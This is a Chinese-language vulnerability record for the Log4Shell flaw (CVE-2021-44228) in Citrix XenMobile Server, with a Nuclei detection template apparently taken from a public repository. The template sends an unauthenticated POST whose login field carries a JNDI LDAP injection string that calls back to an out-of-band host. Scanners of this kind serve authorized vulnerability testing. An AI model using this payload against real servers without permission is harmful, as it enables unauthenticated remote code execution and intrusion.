Citrix XenMobile Server - Remote Code Execution (Apache Log4j)

漏洞信息

漏洞名称： Citrix XenMobile Server - Remote Code Execution (Apache Log4j)

漏洞编号：

• CVE： CVE-2021-44228

漏洞类型： 命令执行

漏洞等级： 严重

漏洞描述： Citrix XenMobile Server是一款企业级移动管理解决方案，广泛用于企业内部移动设备的管理和安全保障。该产品允许企业集中管理移动设备、应用程序和数据，确保企业资源的安全访问。此次漏洞影响的版本包括10.14 RP2、10.13 RP5和10.12 RP10。

该漏洞属于命令执行类型，具体是由于Apache Log4j库中的JNDI功能在配置、日志消息和参数处理时未对攻击者控制的LDAP及其他JNDI相关端点进行有效防护。当消息查找替换功能启用时，攻击者通过控制日志消息或日志消息参数，可以从LDAP服务器加载并执行任意代码。

此漏洞的利用可能导致严重的安全风险，包括远程代码执行、数据泄露和服务中断。由于漏洞利用不需要用户认证，且可以自动化执行，因此攻击者可以轻易地利用此漏洞对企业内部网络进行攻击，造成广泛的影响。

产品厂商： Citrix

产品名称： XenMobile Server

影响版本： 10.14 RP2, 10.13 RP5, 10.12 RP10

搜索语法： title:”XenMobile”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/01a59299771e9178d0aadf2065d772c10e58fac8/http%2Fvulnerabilities%2Fother%2Fxenmobile-server-log4j.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: xenmobile-server-log4j

info:
  name: Citrix XenMobile Server - Remote Code Execution (Apache Log4j)
  author: DhiyaneshDK
  severity: critical
  description: XenMobile Server is an on-premises enterprise mobility management solution and versions 10.14 RP2, 10.13 RP5 and 10.12 RP10 are vulnerable to CVE-2021-44228 (Apache Log4j). JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
  reference:
    - https://support.citrix.com/article/CTX335705/citrix-security-advisory-for-cve202144228-cve202145046-cve202145105-and-cve202144832
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-502
    cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"XenMobile"
    product: xenmobile_server
    vendor: citrix
  tags: cve,cve2021,rce,jndi,log4j,xenmobile,oast,kev
variables:
  rand1: '{{rand_int(111, 999)}}'
  rand2: '{{rand_int(111, 999)}}'

http:
  - raw:
      - |
        @timeout: 20s
        POST /zdm/cxf/login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/zdm/login_xdm_uc.jsp

        login=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.postdata.{{interactsh-url}}}&password=admin

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<h1>500 Server Internal Error'

      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'

    extractors:
      - type: kval
        kval:
          - interactsh_ip

      - type: regex
        part: interactsh_request
        group: 2
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'

      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'
# digest: 490a0046304402207fc920edff5b013d80472c23f0baf57d42def3e0233a7a15a49ccc585aad5c6a02201fc05d5721820a2a39693511be36c2333eb581ae6c20a46338d838fc850509c5:922c64590222798bb761d5b6d8e72950